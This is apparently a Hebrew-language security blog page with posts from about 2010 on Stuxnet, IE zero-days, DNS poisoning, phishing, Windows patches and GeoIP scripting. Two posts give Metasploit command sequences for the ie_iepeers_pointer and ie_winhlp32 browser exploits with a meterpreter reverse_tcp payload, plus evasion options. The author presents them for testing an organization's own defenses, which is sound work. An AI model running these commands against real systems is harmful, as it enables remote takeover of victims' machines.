Latest Security News

Show All

GEO IP - שימוש ב PERL לזיהוי מקורות שמות אתרים וכתובות IP



לא אחת אני נזקק לזיהוי מקור עולמי של כתובות IP המתקיפות את הארגון או זיהוי מידע הנשלח מהארגון .
נכון להיום אין לי כלי מסחרי היודע לנתח את נתוני ה FW ,PROXY וכו ולהראות מיפוי עולמי של גישות אלו.

קיימות מספר חבילות PERL שדרכם ניתן לפרסר כתובות IP ושמות DOMAIN ולזהות את ארץ המקור
אני אתמקד בחבילה: Geo::IPfree
את החבילה ניתן להוריד בקלות דרך ה PACKEGE MANAGER של ה ACTIVE PERL ,החבילה כוללת מספר יכולות אשר ניתן ללמוד עליהם כאן:
http://search.cpan.org/~bricas/Geo-IPfree-1.101650/lib/Geo/IPfree.pm
בנוסף החבילה מגיעה עם קובץ DAT המהווה למעשה את ה DB המקומי של הרשתות בעולם .
את הקובץ רצוי לשדרגאחת לשבוע עד חודש  כאן:
http://software77.net/geo-ip/?DL=4&x=Download
יש למקם אותו בספרית ה PERL במקום הקובץ המקורי המגיע עם החבילה:












 סקריפט לדוגמא הקורא מקובץ CSV את העמודה הראשונה - בודק אותה מול ה GEOIP ומחזיר קובץ CSV חדש בתוספת העמודה הגאוגרפית:

ניתן לשנות ולשהתמש בחלקים בהערה במקום הקיים

להורדת הסקריפט:
https://docs.google.com/leaf?id=0B2RudizokeYDMzhjMjQ4NTQtM2RlMi00YzBlLTkwMGUtNGVmYWY4NWE1YThh&sort=name&layout=list&num=50



















פורסם על ידי
תוויות: , , , , ,

Stuxnet - וירוס חדש +ZERO DAY חדש



רימה חדשה נחתה ביולי 2010 .בכינויים:stuxnetStuxnet (McAfee) , RTKT_STUXNET.A (Trend Micro) , Win32/Stuxnet.A (CA)  .
שני דברים מעניינים בתולעת הזאת ושעבורם הגוף שהזמין את התולעת שילם ה ר ב ה  כסף  להאקר:
  1. התולעת מתקינה שני דרייברים (עבור הROOTKIT) הנראים חתומים בחיתום חוקי של חברת  Realtek ,מעניין איך זה קרה...
  2. שימוש ב ZERODAY חדש הפועל על כל סוגי מערכות ההפעלה חלונות :CVE-2010-2568 המנצל פגיעות בקיצור דרך ,קבצי .LNK.
התולעת מתרבה דרך התקני USB ושיתופים ברשת וזאת ללא שימוש במנגנון ה AUTORUN הידוע לשימצה ונחסם ברוב הארגונים.

לבדיקת ה ZERODAY מול מערכות ההגנה הארגוניות :

מידע נוסף:





פורסם על ידי
תוויות: ,

התקפה טורקית על אתרים ישראליים באמצעות DNS cache poisoning


ביום חמישי ה 10.6.2010 התבצעה התקפת DNS cache poisoning על מספר אתרים ישראליים ע"י קבוצת ההאקרים הטורקית TurkGuvenligi Tayfa  .החברות מיהרו לעדכן ולתקן את הרשומות ב DNS אך עבור משתמשים רבים מאחורי אמצעי CACHEING ארגוניים ( ISA ודומיו)  התופעה נמשכה לאורך כל אותו היום.
הדף שהופנו אליו המשתמשים ממוקם בשיקגו.
FYI





פורסם על ידי

windows update ISO DVD


מיקרוסופט מאפשרת הורדה של דיסקים(ISO) המכילים את עדכוני האבטחה החודשיים .
זאת אופציה טובה עבור איזורים מאובטחים ומנותקים ברשת המצריכים גישה פיזית בלבד להרצת עדכונים וכן עבור ארגונים המיישמים מספר שפות בסניפים ברחבי העולם ולא משתמש באפליקציות כגון WSUS
הדיסקים מכילים את כל השפות וכל מערכות ההפעלה כולל בx64
לקריאה נוספת:

http://support.microsoft.com/kb/913086
פורסם על ידי
תוויות: , ,

Regex Creator - הדרך הקלה לתשלום האגרה




מי לא נתקל בצורך להשתמש ב REGEX בתוך הסקריפטים שלו ,למצוא את ה regex  המדוייק הוא נושא כאוב אך מחויב המציאות.
הכלי החינמי הזה הוא הפתרון המושלם לבעיה ,באמצעותו ניתן לגזור את הביטוי הרגולרי מתוך הטקסט ולבצע בדיקות התאמה , בנוסף ניתן לבנות חיתוך לקבוצות אשר יוצבו כערכים למשתנים בסקריפט.

הכלי מבוסס JAVA וניתן להרצה על כל פלטפורמה התומכת ב JAVA .
כמו שרואים בצילום המסך , מדביקים את ה טקסט במסך העליון ,לאחר מכן ניתן לסמן חלקים כקבועים (delimiters) או כמשתנים- (group) , לאחר שממפים את כל הטקסט ,לוחצים עלgenerate regex
ומעתיקים לסקריפט.
מומלץ בחום .

פורסם על ידי
תוויות: , , ,

Microsoft Security Bulletin MS10-018 - Critical - התשובה ל CVE-2010-0806

פורסם על ידי

yet another zero day for microsoft iexplorer-CVE-2010-0806

שוב -בידקו את מערכות ההגנה שלכם :

Pירצה חדשה בIEXPLORER התגלת ע"י ישראלי בשם משה בן אבו ( כבוד!)
CVE-2010-0806
http://www.securitytube.net/Internet-Explorer-Iepeers-Pointer-Exploit-Metasploit-Demo-video.aspx

Microsoft Security Advisory 981374

Vulnerability in Internet Explorer Could Allow Remote Code Execution

Published: March 09, 2010
Updated: March 12, 2010

msf > use exploit/windows/browser/ie_iepeers_pointer


msf exploit(ie_iepeers_pointer) > show payloads

msf exploit(ie_iepeers_pointer) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ie_iepeers_pointer) > set LHOST [MY IP ADDRESS]

msf exploit(ie_iepeers_pointer) > exploit











פורסם על ידי

בדיקת virtual patch's - או כיצד מערכות האבטחה שלנו מתמודדות עם ZERO DAY  




virtual patch's או זיהוי וחסימת התקפה לפני שיחרור הטלאי הרשמי ל ZERODAY הם הגנה מעולה בזמן הפגיע ביותר למחשבים , כלומר הזמן בו המתקיפים יכולים להשתמש בפגיעות וזיכויי ההצלחה הם  קרוב ל 100%.
אך האם הפרסומים שיוצאים איתם חברות אבטחה המידע נכונים?
ארגונים מעטים מסמלצים התקפות ובודקים את ההגנות לZERODAY ב א מ ת .
אני ממליץ לכל אנשי האבטחה להתקין BACKTRACK ולהשתמש ב METASPLOIT או כלים אחרים לביצוע התקפה אמיתית תוך כדי שימוש בקוד הזמין באינטרנט לבדיקת מערכות האבטחה שלהם.
אין כאן צורך ב PENTEST מעמיק  וזאת צריכה להיות עבודה שהיא חלק מהשוטף .חלק נכבד מההתקפות ניתן לסמלץ בשעה עבודה.
אני אישית כבר עליתי על אבטחת שווא כזאת מחברה שלא אזכיר את שמה ובעקבות זה שונתה החתימה .

לדוגמא
ה Z0RO DAY האחרון מבית מיקרוסופט  המאפשר הרצת קוד על המותקף ע"י פיתויו ללחוץ f1 דרך הודעה הכתובה ב
VB

Microsoft Security Advisory 981169

Vulnerability in VBScript Could Allow Remote Code Execution

Published: March 01, 2010


במקום לשבת ולחקות ל PATCH -נבדוק האם קוד הEXPLOIT זמין וננסה לבדוק את חסינות מערכות האבטחה שלנו מולו
החל מהגנות בגלישה , IPS,MAIL ועד לרמת ה AV המקומי.

הקוד זמין לבדיקה ב METASPLOIT
לאחר כל ההגדרות והעדכונים נעלה אתר ברשת המבצע את ה EXPLOIT ע"י הרצץ הפקודות הבאות

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/browser/ie_winhlp32
msf exploit(ie_winhlp32) > show payloads
msf exploit(ie_winhlp32) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_winhlp32) > set LHOST [MY IP ADDRESS]
msf exploit(ie_winhlp32) > exploit


אופציות המודול:


SRVHOST The local host to listen on. (default: 0.0.0.0)
SRVPORT The local port to listen on. (default: 8080)
SSL Negotiate SSL for incoming connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)
URIPATH The URI to use for this exploit (default is random)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
WORKSPACE Specify the workspace for this module
HTML::base64 Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)
HTTP::header_folding Enable folding of HTTP headers
HTTP::junk_headers Enable insertion of random junk HTTP headers
TCP::max_send_size Maximum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)


בהצלחה



פורסם על ידי
תוויות: , , ,

מה עשרות אלפי משתמשי חלונות ברחבי העולם עשו השבוע?

עשרות אלפי משתמשים בעולם  כיוונו את המסך הבא כך:


הסיבה?
מיקרוסופט שיחררה עדכון דרך מנגנון windows update אשר כל תפקידו הוא למגר את תופעת העותקים הגנובים של מערכת ההפעלה windows 7 .

KB971033 -יורד ומותקן אוטומאטית במחשב ומזהה קרוב ל 70 סוגים שונים של קראקים וסיראלס לא חוקיים.בנוסף,העדכון מכיל מנגנון CALL HOME הפונה למיקרוסופט כל 90 יום ומוריד עדכונים ל WAT (windows activastion technology ) לזיהוי קראקים נוספים שיצוצו .מחשב שזוהה כלא חוקי יקבל מסכים מציקים ושאר הפתעות במיטב המסורת.

עכשיו ,בתור איש אבטחת מידע ,אני בדילמה...
מצד אחד ברור שפעילות מיקרוסופט היא לגיטימית ונועדה למקסם רווחים ולשמור על זכויות היוצרים (נניח רגע בצד את המחירים השערוריתיים והמונופוליזם הזוועתי).מצד שני ,מעתה ואילך ,אותם עשרות אלפי מערכות לא חוקיות לכאורה או שלא לכאורה (מה עם קורבנות אמיתיים?) לא יזכו לראות עדכוני אבטחה בחייהם!
ושלא יהיו טעויות - הקראק לפתרון החסימה בדרך, זה רק עניין של זמן עד שכל אותם מחשבים יחזרו למצבם ה"חוקי"  אך האם המשתמשים יאשרו מחדש פתיחה  של העדכונים האוטומטיים? זה לא יקרה .המחשבים האלו דינם להידבק ולהדביק  ובסופו של דבר גם מחזיקי העותקים החוקיים יפגעו בתהליך.

מננגנון העדכונים של מקרוסופט הופך שוב את עורו ממשהו בעל חשיבות למשהו שנוא שעדיף להשתיקו.

כל זה מוביל אותי לשתי מסקנות:

1. הבעיה היא כמו תמיד ביישום ולא במנגנון ההצפנה :) כלומר ,מיקרוסופט יכולה למצא דרך תקשורת חלופית לזיהוי עותקים לא חוקיים ללא שימוש במנגנון העדכונים ובכך גם לטפל בסוררים וגם לשמור על מערכת הפעלה מעודכנת ומאובטחת.
2. עוד עבודה בשבילי!

שבת שלום.


פורסם על ידי

מתקפת PHISHING במסגרת אהבתנו ל FACEBOOK

עשרות מיילים נשלחו לארגון בו אני עובד בזו הלשון:
במבט מהיר על סגנון הטקסט ניתן לקבוע כי אנגלית איננה שפת האם של השולחים:)

בבדיקת הקובץ התקבלו התוצאות:
הקובץ מזוהה ע"י רוב חברות הAV כDROPPER - החלק הראשון של הטרויאני כלומר הקובץ ה"מכין את השטח" וממתין לביצוע הורדה של חלקים נוספים של הוירוס למטרון שונות
ראו הוזהרתם

פורסם על ידי

Tidserv and MS10-015 -מסכים כחולים-רע לעסקים

עדכוני windows לחודש פברואר 2010 כללו בין השאר עדכון לקרנל המונע העלאת הרשאות -privlages elevation
העדכון עורר סערה בקרב אנשי הסיסטם ואבטחת המידע בטענה כי כתוצאה מהתקנתו המחשב קורס ומתקבל מסך כחול (blue screen of death).
תופעה זו נדירה ביותר ויאמר לזכותה של מיקרוסופט שתהליכי הבדיקות שלה נעשים בצורה מדוקדקת וטובה.

התופעה הקפיצה את אנשי אבטחת המידע לחקור לעומק את העניין והמסקנה לא אחרה לבוא:
מחשבים שהכילו את הוירוס :Backdoor.Tidserv אשר אחד ממאפיניו הוא שימוש ב ROOTKIT המשנה קבצי מערכת שונים על מנת להסוות את פעילות הוירוס , הם הם היחידים שקיבלו את המסך הכחול הארור.

הקבצים ששונו ע"י טלאי האבטחה הם:
:atapi.sys
iastor.sys
idechndr.sys
ndis.sys
nvata.sys
vmscsi.sys

בגדול -כאשר הוירוס פונה אל הAPI של חלקים אלו במערכת ההפעלה לאחר השינוי שלהם ע"י ה PATCH - הוא מקבל תשובה שגוייה ונכנס למצב ERROR שבו המחשב קורס.
נכון להיום "יוצרי" הוירוס כתבו אותו מחדש כך שיתאים לשינוי שמיקרוסופט ביצעה כי אחרי הכול מסכים כחולים רעים לעסקים גם של מפעילי הוירוס :) 
לאחר הגילוי - הפצנו את הטלאי בארגוננו - ממליץ לכל שאר הארגונים לבצע זאת.

פורסם על ידי

מאמר שלי התפרסם היום בירחון אבטחת המידע digitalwhisper

לצפיה והורדה:
http://www.digitalwhisper.co.il/0x0D/

מומלץ


פורסם על ידי
Subscribe to: Posts (Atom)